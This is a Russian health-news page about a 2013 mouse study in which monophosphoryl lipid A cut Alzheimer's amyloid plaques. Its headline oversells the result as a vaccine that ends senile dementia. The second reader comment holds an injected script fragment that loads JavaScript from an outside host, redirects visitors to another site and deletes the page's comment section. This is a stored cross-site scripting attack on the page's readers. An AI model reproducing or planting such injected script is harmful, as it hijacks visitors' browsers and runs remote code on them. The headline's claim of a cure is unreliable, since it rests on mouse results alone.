Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Старческого маразма больш...  >>  Старческого маразма больше нет: изобретена вакцина против болезни Альцгеймера
 
Обратная связь
 

Старческого маразма больше нет: изобретена вакцина против болезни Альцгеймера

Размер шрифта
18 января 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Группа канадских ученых и фармацевтическая компания GlaxoSmithKline нашли способ стимуляции естественных защитных механизмов головного мозга у пациентов с болезнью Альцгеймера.

старческого маразма больше не будет

Болезнь Альцгеймера характеризуется образованием в головном мозге белка бета-амилоида. Микроглиальные клетки, защищающие нервную систему, не способны избавиться от бета-амилоида, поэтому белок откладывается в головном мозге в виде бляшек.

Группе канадских ученых из Университета Лаваля под руководством Сержа Ривеста удалось обнаружить вещество, которое стимулирует активность иммунных клеток головного мозга. Это вещество носит название монофосфорил липид А (МФЛ) и на протяжении нескольких лет используется компанией GlaxoSmithKline в качестве вспомогательного средства для приготовления вакцин.

Результаты исследования на мышах с симптомами болезни Альцгеймера свидетельствуют о том, что еженедельное введение МФЛ в течение 12 недель позволяет сократить количество амилоидных бляшек на 80%. Кроме того, во время лечения наблюдалось улучшение способности мышей к обучению.

По мнению ученых, МФЛ можно вводить как пациентам с болезнью Альцгеймера для замедления прогрессирования заболевания, так и здоровым людям в виде вакцины для стимуляции иммунитета. «Вакцину против болезни Альцгеймера смогут получить и пациенты, и здоровые люди, имеющие факторы риска развития заболевания», – поясняет Серж Ривест.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

27 января 2013 в 16:24

Цитировать   |   Пожаловаться

Знаете, многие люди по молодости говорят, не дай Бог мне дожить до такого состояния, до старческого маразма. После изобретения такой вакцины этого утверждения больше не будет.Люди перестанут бояться дожить до такого состояния. И это хорошо! 

2 - zzzzzz

30 июня 2015 в 23:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лучшие привычки для молодости мозга   В чем связь между жеванием и умом?   Как правильно пить кофе   Ваш индекс массы тела предскажет, будет у вас слабоумие или нет  
17 января 2013Старческого маразма больше нет! Изобретена вакцина против болезни Альцгеймера! 23 ноября 2012В чем связь между жеванием и умом?
 
14 января 2013Ученые изобрели лекарство для лечения старческого слабоумия 30 августа 2012Высокий сахар в крови приводит к старческому слабоумию!
 

Слайдшоу

1
Еда для силы мозга
Мифы и правда о старческом слабоумии
Как не сойти с ума в старости

Тесты

Возраст мозга
Знаете ли вы свой мозг?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.